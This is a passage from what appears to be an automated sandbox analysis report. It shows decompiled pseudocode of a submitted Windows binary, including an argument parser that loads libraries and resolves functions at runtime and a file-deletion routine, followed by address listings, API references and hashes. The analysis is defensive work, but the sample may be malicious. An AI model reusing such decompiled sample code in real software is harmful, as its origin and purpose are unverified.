							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t261 - 0x2d;
									if(_t261 == 0x2d) {
										L151:
										_t304 =  *_t321;
										__eflags = _t304 - 0x2d;
										if(_t304 != 0x2d) {
											L154:
											_t264 =  &(_t321[1]);
											__eflags =  *_t264 - 0x3a;
											if( *_t264 != 0x3a) {
												goto L162;
											}
											__eflags = _t304 - 0x2d;
											if(_t304 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t264;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t283;
											} else {
												 *_v28 = _t283;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t264 =  &(_t321[1]);
										__eflags =  *_t264 - 0x3e;
										if( *_t264 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t261 - 0x3a;
									if(_t261 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t269 = _t260 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									L80:
									_t305 = _t286 + 0xffffffde;
									__eflags = _t305 - 0x55;
									if(_t305 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t305 + 0x70ac23e8) & 0x000000ff) * 4 +  &M70AC235C))) {
										case 0:
											__ecx = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												L131:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
												if( *((intOrPtr*)(__edi + 2)) != __dx) {
													L136:
													 *__ecx =  *__ecx & 0x00000000;
													__eax = E70AC12CC(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __ax;
												if(__ax == 0) {
													goto L136;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__edi = __edi + 1;
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__ax =  *__edi;
												 *__ecx =  *__edi;
												__ecx = __ecx + 1;
												__ecx = __ecx + 1;
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 2;
											__ebx = E70AC12BB();
											 &_v12 = E70AC1B86( &_v12);
											__eax = E70AC1510(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E70AC1B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t271 =  *(_t332 + 0x1014);
											__eflags = _t271 - _v16;
											if(_t271 > _v16) {
												_v16 = _t271;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t271 - (_v36 == 3);
											if(_t271 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E70AC1B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(4);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x70ac405c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x1018) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x1028) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E70AC1B86( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
												_t136 = _v16 + 0x81; // 0x81
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x1030)) = 0;
												 *((intOrPtr*)(__edi + 0x102c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x102c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x1030; // 0x1030
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t272 = _t269 - 1;
								__eflags = _t272;
								if(_t272 == 0) {
									_v16 = _t283;
									goto L80;
								}
								__eflags = _t272 != 1;
								if(_t272 != 1) {
									goto L162;
								}
								__eflags = _t286 - 0x6e;
								if(__eflags > 0) {
									_t309 = _t286 - 0x72;
									__eflags = _t309;
									if(_t309 == 0) {
										_push(4);
										L74:
										_pop(_t274);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t332 + 0x1010;
											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
											__eflags =  *_t96;
										} else {
											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
										}
										_v8 = 1;
										goto L57;
									}
									_t312 = _t309 - 1;
									__eflags = _t312;
									if(_t312 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t312 != 0;
									if(_t312 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t315 = _t286 - 0x21;
								__eflags = _t315;
								if(_t315 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t316 = _t315 - 0x11;
								__eflags = _t316;
								if(_t316 == 0) {
									_t274 = 0x100;
									goto L75;
								}
								_t317 = _t316 - 0x31;
								__eflags = _t317;
								if(_t317 == 0) {
									_t274 = 1;
									goto L75;
								}
								__eflags = _t317 != 0;
								if(_t317 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t283;
								_v36 = _t283;
								goto L20;
							}
						}
						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
						if( *((short*)(_t321 - 2)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							goto L43;
						}
						goto L17;
					}
					_t277 = _t258 - 5;
					if(_t277 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t283;
							_v20 = _t283;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t283;
							goto L20;
						}
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t283;
							_v20 = _t283;
							goto L20;
						}
					}
					if(_t281 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
					L182:
					return _t332;
				} else {
					_t225 =  *_t332 - 1;
					if(_t225 == 0) {
						_t187 = _t332 + 8; // 0x8
						_t324 = _t187;
						__eflags =  *_t324 - _t283;
						if( *_t324 != _t283) {
							_t226 = GetModuleHandleW(_t324);
							__eflags = _t226 - _t283;
							 *(_t332 + 0x1008) = _t226;
							if(_t226 != _t283) {
								L171:
								_t192 = _t332 + 0x808; // 0x808
								_t325 = _t192;
								_t227 = E70AC16BD( *(_t332 + 0x1008), _t325);
								__eflags = _t227 - _t283;
								 *(_t332 + 0x100c) = _t227;
								if(_t227 == _t283) {
									__eflags =  *_t325 - 0x23;
									if( *_t325 == 0x23) {
										_t195 = _t332 + 0x80a; // 0x80a
										_t231 = E70AC13B1(_t195);
										__eflags = _t231 - _t283;
										if(_t231 != _t283) {
											__eflags = _t231 & 0xffff0000;
											if((_t231 & 0xffff0000) == 0) {
												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t283;
								if(_v52 != _t283) {
									L178:
									_t325[lstrlenW(_t325)] = 0x57;
									_t229 = E70AC16BD( *(_t332 + 0x1008), _t325);
									__eflags = _t229 - _t283;
									if(_t229 != _t283) {
										L166:
										 *(_t332 + 0x100c) = _t229;
										goto L182;
									}
									__eflags =  *(_t332 + 0x100c) - _t283;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t206 = _t332 + 4;
									 *_t206 =  *(_t332 + 4) | 0xffffffff;
									__eflags =  *_t206;
									goto L182;
								} else {
									__eflags =  *(_t332 + 0x100c) - _t283;
									if( *(_t332 + 0x100c) != _t283) {
										goto L182;
									}
									goto L178;
								}
							}
							_t234 = LoadLibraryW(_t324);
							__eflags = _t234 - _t283;
							 *(_t332 + 0x1008) = _t234;
							if(_t234 == _t283) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t332 + 0x808; // 0x808
						_t236 = E70AC13B1(_t188);
						 *(_t332 + 0x100c) = _t236;
						__eflags = _t236 - _t283;
						goto L180;
					}
					_t237 = _t225 - 1;
					if(_t237 == 0) {
						_t185 = _t332 + 0x808; // 0x808
						_t238 = _t185;
						__eflags =  *_t238 - _t283;
						if( *_t238 == _t283) {
							goto L182;
						}
						_t229 = E70AC13B1(_t238);
						L165:
						goto L166;
					}
					if(_t237 != 1) {
						goto L182;
					}
					_t81 = _t332 + 8; // 0x8
					_t284 = _t81;
					_t326 = E70AC13B1(_t81);
					 *(_t332 + 0x1008) = _t326;
					if(_t326 == 0) {
						goto L181;
					}
					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1050)) = E70AC12CC(_t284);
					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
					_t90 = _t332 + 0x808; // 0x808
					_t229 =  *(_t326->i + E70AC13B1(_t90) * 4);
					goto L165;
				}
			}

0x70ac1c07
0x70ac1c0a
0x70ac1c0d
0x70ac1c10
0x70ac1c13
0x70ac1c16
0x70ac1c19
0x70ac1c1b
0x70ac1c1e
0x70ac1c21
0x70ac1c26
0x70ac1c29
0x70ac1c31
0x70ac1c39
0x70ac1c3b
0x70ac1c3e
0x70ac1c46
0x70ac1c46
0x70ac1c4b
0x70ac1c4e
0x00000000
0x00000000
0x70ac1c5b
0x70ac1c60
0x70ac1c62
0x70ac1cf4
0x70ac1cf4
0x70ac1cf4
0x70ac1cf8
0x70ac1cfb
0x70ac1cfd
0x70ac1d1f
0x70ac1d21
0x70ac1d24
0x70ac1d2d
0x70ac1d33
0x70ac1d35
0x70ac1d3b
0x70ac1d3b
0x70ac1d41
0x70ac1d44
0x70ac1d44
0x70ac1d47
0x70ac1d47
0x70ac1d4d
0x70ac1d4f
0x70ac1d4f
0x70ac1d51
0x70ac1d54
0x70ac1d57
0x70ac1d5d
0x70ac1d63
0x70ac1d66
0x70ac1d8a
0x70ac1d8d
0x00000000
0x00000000
0x70ac1d90
0x70ac1d92
0x70ac1da0
0x70ac1da3
0x70ac1da5
0x00000000
0x00000000
0x00000000
0x00000000
0x70ac1da7
0x70ac1da7
0x70ac1da7
0x70ac1dad
0x70ac1daf
0x00000000
0x00000000
0x70ac1db1
0x70ac1db3
0x70ac1db5
0x70ac1db7
0x00000000
0x00000000
0x00000000
0x70ac1db7
0x70ac1db9
0x70ac1dbb
0x70ac1dbd
0x70ac1dbd
0x70ac1dc3
0x70ac1dc9
0x70ac1dcb
0x70ac1ddf
0x70ac1ddf
0x70ac1de1
0x70ac1dcd
0x70ac1dd3
0x70ac1dd6
0x70ac1dd6
0x00000000
0x70ac1d68
0x70ac1d68
0x70ac1d68
0x70ac1d69
0x70ac1d71
0x70ac1d75
0x70ac1d7b
0x70ac1d7f
0x00000000
0x70ac1d7f
0x70ac1d6b
0x70ac1d6b
0x70ac1d6c
0x00000000
0x00000000
0x70ac1d6e
0x70ac1d6f
0x00000000
0x00000000
0x00000000
0x70ac1d6f
0x70ac1cff
0x70ac1d00
0x70ac1d09
0x70ac1d0c
0x70ac1d19
0x70ac1d19
0x70ac1d0e
0x70ac1d0e
0x70ac1de7
0x70ac1dea
0x70ac1dee
0x70ac1e61
0x70ac1e65
0x70ac1c43
0x00000000
0x70ac1c43
0x00000000
0x70ac1e65
0x70ac1cfd
0x70ac1c68
0x70ac1c6b
0x70ac1cce
0x70ac1cd1
0x70ac1ce3
0x70ac1ce3
0x70ac1ce6
0x70ac1df3
0x70ac1df6
0x70ac1df6
0x70ac1df8
0x70ac21ae
0x70ac21c6
0x70ac21c6
0x70ac21c9
0x00000000
0x00000000
0x70ac21b3
0x70ac21b4
0x70ac21b7
0x70ac21ba
0x70ac2244
0x70ac224b
0x70ac2251
0x70ac2255
0x70ac1e5c
0x70ac1e5d
0x70ac1e5d
0x70ac1e5e
0x00000000
0x70ac1e5e
0x70ac21c0
0x70ac21c3
0x70ac21c3
0x70ac21cb
0x70ac21ce
0x70ac2238
0x70ac1e51
0x70ac1e54
0x70ac1e57
0x70ac1e5a
0x70ac1e5a
0x00000000
0x70ac1e5a
0x70ac21d0
0x70ac21d3
0x70ac21da
0x70ac21da
0x70ac21dd
0x70ac21e1
0x70ac21f5
0x70ac21f5
0x70ac21f8
0x70ac21fc
0x00000000
0x00000000
0x70ac21fe
0x70ac2202
0x00000000
0x00000000
0x70ac2204
0x70ac220b
0x70ac220b
0x70ac2211
0x70ac2214
0x70ac2230
0x70ac2216
0x70ac221f
0x70ac2222
0x70ac2222
0x00000000
0x70ac2214
0x70ac21e3
0x70ac21e6
0x70ac21ea
0x00000000
0x00000000
0x70ac21ec
0x00000000
0x70ac21ec
0x70ac21d5
0x70ac21d8
0x00000000
0x00000000
0x00000000
0x70ac21d8
0x70ac1dfe
0x70ac1dfe
0x70ac1dff
0x70ac1f49
0x70ac1f49
0x70ac1f50
0x70ac1f53
0x00000000
0x00000000
0x70ac1f60
0x00000000
0x70ac214b
0x70ac214e
0x70ac2151
0x70ac2151
0x70ac2152
0x70ac2153
0x70ac2156
0x70ac2159
0x70ac215c
0x00000000
0x00000000
0x70ac215e
0x70ac215e
0x70ac2162
0x70ac217a
0x70ac217d
0x70ac2181
0x70ac2187
0x00000000
0x70ac2187
0x70ac2164
0x70ac2164
0x70ac2167
0x00000000
0x00000000
0x70ac2169
0x70ac216c
0x70ac216e
0x70ac216f
0x70ac216f
0x70ac216f
0x70ac2170
0x70ac2173
0x70ac2176
0x70ac2177
0x70ac2151
0x70ac2152
0x70ac2153
0x70ac2156
0x70ac2159
0x70ac215c
0x00000000
0x00000000
0x00000000
0x70ac215c
0x00000000
0x70ac1fa7
0x00000000
0x00000000
0x70ac1fb3
0x00000000
0x00000000
0x70ac1f9a
0x70ac1f9e
0x70ac1fa2
0x00000000
0x00000000
0x70ac211c
0x70ac2120
0x00000000
0x00000000
0x70ac2126
0x70ac212f
0x70ac2136
0x70ac213e
0x00000000
0x00000000
0x70ac2083
0x70ac2083
0x00000000
0x00000000
0x70ac1fbc
0x00000000
0x00000000
0x70ac21a6
0x00000000
0x00000000
0x70ac208b
0x70ac208d
0x70ac208d
0x00000000
0x00000000
0x70ac2196
0x00000000
0x00000000
0x70ac219a
0x00000000
0x00000000
0x70ac21a2
0x00000000
0x00000000
0x70ac20d3
0x70ac20d5
0x70ac20d5
0x00000000
0x00000000
0x70ac209d
0x70ac209f
0x70ac209f
0x00000000
0x00000000
0x70ac20af
0x70ac20b1
0x70ac20b1
0x00000000
0x00000000
0x70ac20e1
0x70ac20e3
0x70ac20e3
0x00000000
0x00000000
0x70ac20ba
0x70ac20bc
0x70ac20bc
0x00000000
0x00000000
0x70ac20c1
0x00000000
0x00000000
0x70ac219e
0x70ac21a8
0x70ac21a8
0x00000000
0x00000000
0x70ac20ec
0x70ac20f0
0x70ac20f5
0x70ac20f8
0x70ac20f9
0x70ac20fc
0x70ac2102
0x70ac2102
0x00000000
0x00000000
0x70ac218e
0x00000000
0x00000000
0x70ac20c5
0x70ac20c7
0x70ac20c7
0x00000000
0x00000000
0x70ac1fc3
0x70ac1fc3
0x00000000
0x00000000
0x70ac20da
0x70ac20dc
0x70ac20dc
0x00000000
0x00000000
0x70ac1f67
0x70ac1f6d
0x70ac1f70
0x70ac1f72
0x70ac1f72
0x70ac1f75
0x70ac1f79
0x70ac1f86
0x70ac1f88
0x70ac1f8e
0x70ac1f8e
0x70ac1f8e
0x00000000
0x00000000
0x70ac208e
0x70ac208e
0x70ac2090
0x70ac2097
0x00000000
0x00000000
0x70ac20d6
0x70ac20d6
0x00000000
0x00000000
0x70ac20a0
0x70ac20a0
0x70ac20a2
0x70ac20a9
0x00000000
0x00000000
0x70ac20b2
0x70ac20b2
0x70ac20b4
0x00000000
0x00000000
0x70ac20e4
0x70ac20e4
0x00000000
0x00000000
0x70ac20bd
0x70ac20bd
0x00000000
0x00000000
0x70ac210a
0x70ac210e
0x70ac2113
0x70ac2116
0x00000000
0x00000000
0x70ac20c8
0x70ac20c8
0x70ac20cb
0x70ac20cd
0x00000000
0x00000000
0x70ac20dd
0x70ac20dd
0x70ac20e6
0x70ac20e6
0x70ac1fc5
0x70ac1fc5
0x70ac1fc8
0x70ac1fcf
0x70ac1fd1
0x70ac1fd3
0x70ac1fda
0x70ac1fdd
0x70ac1fe2
0x70ac1fe4
0x70ac1fe6
0x70ac1fea
0x70ac1ff0
0x70ac1ff6
0x70ac1ff6
0x70ac1ff8
0x70ac1ff8
0x70ac1ff9
0x70ac1ff9
0x70ac1ffd
0x70ac2003
0x70ac2005
0x70ac2009
0x70ac200e
0x70ac200e
0x70ac2010
0x70ac2010
0x70ac2013
0x70ac2016
0x70ac201f
0x70ac2025
0x70ac2028
0x70ac2028
0x70ac202a
0x70ac202d
0x70ac2033
0x70ac2039
0x70ac2039
0x70ac203b
0x00000000
0x00000000
0x70ac2041
0x70ac2041
0x70ac2045
0x70ac204c
0x70ac2070
0x70ac2070
0x70ac2074
0x70ac2076
0x70ac2079
0x70ac2079
0x70ac207c
0x70ac207c
0x00000000
0x70ac2074
0x70ac2051
0x70ac2054
0x70ac2054
0x70ac205b
0x70ac205d
0x70ac2060
0x70ac2067
0x70ac2068
0x70ac206e
0x70ac206e
0x00000000
0x70ac206e
0x70ac2062
0x70ac2065
0x00000000
0x00000000
0x00000000
0x70ac2065
0x70ac1ff2
0x70ac1ff4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x70ac1f60
0x70ac1e05
0x70ac1e05
0x70ac1e06
0x70ac1f46
0x00000000
0x70ac1f46
0x70ac1e0c
0x70ac1e0d
0x00000000
0x00000000
0x70ac1e13
0x70ac1e16
0x70ac1f0b
0x70ac1f0b
0x70ac1f0e
0x70ac1f23
0x70ac1f25
0x70ac1f25
0x70ac1f26
0x70ac1f29
0x70ac1f2c
0x70ac1f38
0x70ac1f38
0x70ac1f38
0x70ac1f2e
0x70ac1f2e
0x70ac1f2e
0x70ac1f3e
0x00000000
0x70ac1f3e
0x70ac1f10
0x70ac1f10
0x70ac1f11
0x70ac1f1f
0x00000000
0x70ac1f1f
0x70ac1f14
0x70ac1f15
0x00000000
0x00000000
0x70ac1f1b
0x00000000
0x70ac1f1b
0x70ac1e1c
0x70ac1f07
0x00000000
0x70ac1f07
0x70ac1e22
0x70ac1e22
0x70ac1e25
0x70ac1e4e
0x00000000
0x70ac1e4e
0x70ac1e27
0x70ac1e27
0x70ac1e2a
0x70ac1e44
0x00000000
0x70ac1e44
0x70ac1e2c
0x70ac1e2c
0x70ac1e2f
0x70ac1e3e
0x00000000
0x70ac1e3e
0x70ac1e32
0x70ac1e33
0x00000000
0x00000000
0x70ac1e35
0x00000000
0x70ac1cec
0x70ac1cec
0x70ac1cef
0x00000000
0x70ac1cef
0x70ac1ce6
0x70ac1cd3
0x70ac1cd8
0x00000000
0x00000000
0x70ac1cda
0x70ac1cdd
0x00000000
0x00000000
0x00000000
0x70ac1cdd
0x70ac1c6d
0x70ac1c70
0x70ac1ca6
0x70ac1ca9
0x00000000
0x70ac1caf
0x70ac1cb1
0x70ac1cb5
0x70ac1cbc
0x70ac1cc3
0x70ac1cc6
0x70ac1cc9
0x00000000
0x70ac1cc9
0x70ac1ca9
0x70ac1c72
0x70ac1c73
0x70ac1c8e
0x70ac1c91
0x00000000
0x70ac1c97
0x70ac1c97
0x70ac1c9e
0x70ac1ca1
0x00000000
0x70ac1ca1
0x70ac1c91
0x70ac1c78
0x00000000
0x70ac1c7e
0x70ac1c7e
0x70ac1c85
0x00000000
0x70ac1c85
0x70ac1c78
0x70ac1e74
0x70ac1e79
0x70ac1e7e
0x70ac1e82
0x70ac2355
0x70ac235b
0x70ac1e94
0x70ac1e96
0x70ac1e97
0x70ac227e
0x70ac227e
0x70ac2281
0x70ac2284
0x70ac22a1
0x70ac22a7
0x70ac22a9
0x70ac22af
0x70ac22c6
0x70ac22c6
0x70ac22c6
0x70ac22d3
0x70ac22d9
0x70ac22dc
0x70ac22e2
0x70ac22e4
0x70ac22e8
0x70ac22ea
0x70ac22f1
0x70ac22f6
0x70ac22f9
0x70ac22fb
0x70ac2300
0x70ac2312
0x70ac2312
0x70ac2300
0x70ac22f9
0x70ac22e8
0x70ac2318
0x70ac231b
0x70ac2325
0x70ac232d
0x70ac233a
0x70ac2340
0x70ac2343
0x70ac2273
0x70ac2273
0x00000000
0x70ac2273
0x70ac2349
0x70ac234f
0x70ac234f
0x00000000
0x00000000
0x70ac2351
0x70ac2351
0x70ac2351
0x70ac2351
0x00000000
0x70ac231d
0x70ac231d
0x70ac2323
0x00000000
0x00000000
0x00000000
0x70ac2323
0x70ac231b
0x70ac22b2
0x70ac22b8
0x70ac22ba
0x70ac22c0
0x00000000
0x00000000
0x00000000
0x70ac22c0
0x70ac2286
0x70ac228d
0x70ac2293
0x70ac2299
0x00000000
0x70ac2299
0x70ac1e9d
0x70ac1e9e
0x70ac225d
0x70ac225d
0x70ac2263
0x70ac2266
0x00000000
0x00000000
0x70ac226d
0x70ac2272
0x00000000
0x70ac2272
0x70ac1ea5
0x00000000
0x00000000
0x70ac1eab
0x70ac1eab
0x70ac1eb4
0x70ac1eb9
0x70ac1ebf
0x00000000
0x00000000
0x70ac1ec5
0x70ac1ed2
0x70ac1ed8
0x70ac1ee2
0x70ac1ee8
0x70ac1ef0
0x70ac1f00
0x00000000
0x70ac1f00

APIs

Part of subcall function 70AC12BB: GlobalAlloc.KERNEL32(00000040,?,70AC12DB,?,70AC137F,00000019,70AC11CA,-000000A0), ref: 70AC12C5

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 70AC1D2D
lstrcpyW.KERNEL32(00000008,?), ref: 70AC1D75
lstrcpyW.KERNEL32(00000808,?), ref: 70AC1D7F
GlobalFree.KERNEL32(00000000), ref: 70AC1D92
GlobalFree.KERNEL32(?), ref: 70AC1E74
GlobalFree.KERNEL32(?), ref: 70AC1E79
GlobalFree.KERNEL32(?), ref: 70AC1E7E
GlobalFree.KERNEL32(00000000), ref: 70AC2068
lstrcpyW.KERNEL32(?,?), ref: 70AC2222
GetModuleHandleW.KERNEL32(00000008), ref: 70AC22A1
LoadLibraryW.KERNEL32(00000008), ref: 70AC22B2
GetProcAddress.KERNEL32(?,?), ref: 70AC230C
lstrlenW.KERNEL32(00000808), ref: 70AC2326

Memory Dump Source

Source File: 00000001.00000002.4884852064.0000000070AC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 70AC0000, based on PE: true

Associated: 00000001.00000002.4884744827.0000000070AC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.4884980920.0000000070AC4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.4885091070.0000000070AC6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70ac0000_file.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 53606244aa4428162f129c314145e1bc87c2970a36f335ceb98edf569b14613a
Instruction ID: 8cd7dac90c2397cf4ac89f137e5cd252feedc4a27d5310648c56301cd8fe1be0
Opcode Fuzzy Hash: 53606244aa4428162f129c314145e1bc87c2970a36f335ceb98edf569b14613a
Instruction Fuzzy Hash: 2922AC71E04206DECB12CFA4C9807EFB7B5FB0A305F22452ED566E6258D774DA81DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00405C13 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405C13(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405EDE(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2a8 =  *0x42a2a8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406507(0x425710, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
